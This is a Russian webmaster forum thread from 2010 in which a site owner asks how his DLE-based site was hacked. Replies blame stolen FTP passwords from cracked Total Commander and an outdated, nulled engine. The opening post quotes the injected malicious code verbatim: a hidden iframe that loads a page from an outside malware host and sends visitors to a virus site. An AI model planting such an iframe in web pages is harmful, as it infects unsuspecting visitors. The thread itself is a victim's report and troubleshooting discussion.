X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

3 страниц V   1 2 3 >
Открыть тему
Тема закрыта
> Взломали сайт, на DLE
Frankie
Frankie
Topic Starter сообщение 20.4.2010, 22:32; Ответить: Frankie
Сообщение #1


Старожил
******

Группа: Active User
Сообщений: 1520
Регистрация: 18.9.2009
Поблагодарили: 320 раз
Репутация:   36  


Блин, вышел из дома вечером на пару часов, с друзьями пива попить...
Возвращаюсь домой, а варезник из подписи поломали и вставили вредоносный код.
Вычислил я его в страницах index.php и main.tpl, код был вот такой
<iframe src="http://fiwzv.ru/top/iframe.php" width=2 height=2 style="visibility: hidden"></iframe>

код редиректил пользователя на сайт с вирусом.
написал хостеру, посмотрим че ответят.

Отсюда вопрос: каким образом могли поломать? Подозреваю, что взломали не сам сайт, а вероятно фтп, раз добрались до index.php
Есть у кого-то мысли какие-то по этом поводу?

Сообщение отредактировал Frankie - 20.4.2010, 23:56
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Mike1111
Mike1111
сообщение 20.4.2010, 22:36; Ответить: Mike1111
Сообщение #2


Mix Fight M-1
*****

Группа: Active User
Сообщений: 722
Регистрация: 21.9.2009
Поблагодарили: 385 раз
Репутация:   73  


Какая защита на машине стоит? Антивирь, фаервол?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
guz
guz
сообщение 20.4.2010, 22:39; Ответить: guz
Сообщение #3


Котяра
*****

Группа: Active User
Сообщений: 850
Регистрация: 29.9.2008
Из: Санкт-Петербург
Поблагодарили: 221 раз
Репутация:   55  


спёрли пароли в фтп, у меня постоянно так ломают, ничего страшного , смени пароли на хостинге и все. с Тотал коммандер постоянно воруют.

Сообщение отредактировал guz - 20.4.2010, 22:40


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
N1cE
N1cE
сообщение 20.4.2010, 22:42; Ответить: N1cE
Сообщение #4


Russian Style^^;
*****

Группа: Active User
Сообщений: 662
Регистрация: 5.5.2008
Из: Пермь
Поблагодарили: 140 раз
Репутация:   15  


(guz @ 21.4.2010, 0:39) *
ничего страшного

То есть - ломают сайты и по*уй - пускай ломают, делов то - пароли постоянно менять и шнягу с сайта снимать вилкой как лапшу?
P.S. Простите за мой французкий blush.gif
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
werts
werts
сообщение 20.4.2010, 22:43; Ответить: werts
Сообщение #5


Бывалый
****

Группа: User
Сообщений: 349
Регистрация: 29.3.2009
Поблагодарили: 151 раз
Репутация:   21  


У меня ломали через FTP, по глупости пароли в Total Commander оставлял. Вредоносный код был добавлен вовсе файлы index и main в конец страницы.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Frankie
Frankie
Topic Starter сообщение 20.4.2010, 22:48; Ответить: Frankie
Сообщение #6


Старожил
******

Группа: Active User
Сообщений: 1520
Регистрация: 18.9.2009
Поблагодарили: 320 раз
Репутация:   36  


(Mike1111 @ 20.4.2010, 22:36) *
Какая защита на машине стоит? Антивирь, фаервол?

на коме стоит Dr.Web Security Space(вроде так называется, непомню как правильно, но в общем комплексная защита)
(guz @ 20.4.2010, 22:39) *
спёрли пароли в фтп, у меня постоянно так ломают, ничего страшного , смени пароли на хостинге и все. с Тотал коммандер постоянно воруют.

в том и дело, что пароли не храню в тотале

при каждом подключении ввожу пароль заново
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
ChristmasNet
ChristmasNet
сообщение 20.4.2010, 23:00; Ответить: ChristmasNet
Сообщение #7


Бывалый
****

Группа: User
Сообщений: 441
Регистрация: 13.1.2010
Из: Россия, ХМАО
Поблагодарили: 93 раза
Репутация:   16  


Пора значит двиг обновлять
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
guz
guz
сообщение 20.4.2010, 23:09; Ответить: guz
Сообщение #8


Котяра
*****

Группа: Active User
Сообщений: 850
Регистрация: 29.9.2008
Из: Санкт-Петербург
Поблагодарили: 221 раз
Репутация:   55  


(N1cE @ 20.4.2010, 22:42) *
То есть - ломают сайты и по*уй - пускай ломают, делов то - пароли постоянно менять и шнягу с сайта снимать вилкой как лапшу?
P.S. Простите за мой французкий blush.gif

ломают редко, может раз в пол года, бекапы есть, антивирь стоит касперский лицензия, пароли не храню ввожу каждый раз...а ломают, вместо того чтобы гадать, раз в пол года можно почистить и сменить...

а еще проще - лучшая защита - раз в месяц менять все пароли и все.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
FeraS
FeraS
сообщение 20.4.2010, 23:13; Ответить: FeraS
Сообщение #9


Участник
***

Группа: User
Сообщений: 237
Регистрация: 9.1.2008
Поблагодарили: 70 раз
Репутация:   15  


Не юзайте крякнутый тоталкомандер. По своему горькому опыту знаю. Тоже ломали не раз. Лучше вообще юзать что-нибудь типа FileZilla.


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Frankie
Frankie
Topic Starter сообщение 20.4.2010, 23:15; Ответить: Frankie
Сообщение #10


Старожил
******

Группа: Active User
Сообщений: 1520
Регистрация: 18.9.2009
Поблагодарили: 320 раз
Репутация:   36  


(ChristmasNet @ 20.4.2010, 23:00) *
Пора значит двиг обновлять

возможно... сейчас сайт работает на 8.2, с заплаткой. нулл от мид-тима
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
3 страниц V   1 2 3 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Стану Вашим рефералом. Готовый трастовый сайт в наличии!
0 referer 253 Сегодня, 1:43
автор: referer
Открытая тема (нет новых ответов) Продам сайт под развитие
Под будущий СДЛ, тематика бизнес, возраст 1 год
6 abafons 1421 Вчера, 12:55
автор: abafons
Открытая тема (нет новых ответов) Попинайте сайт
6 yanat 720 Вчера, 12:12
автор: Iga
Открытая тема (нет новых ответов) Нужен новостник на сайт
Требуется новостник для сотрудничества
6 opanas 833 Вчера, 1:50
автор: belfagor
Открытая тема (нет новых ответов) Взломали аккаунт Алиекспресс
Внимание мошенники
13 Intersect 519 16.12.2017, 20:42
автор: Emtec


 



RSS Текстовая версия Сейчас: 18.12.2017, 3:57
Дизайн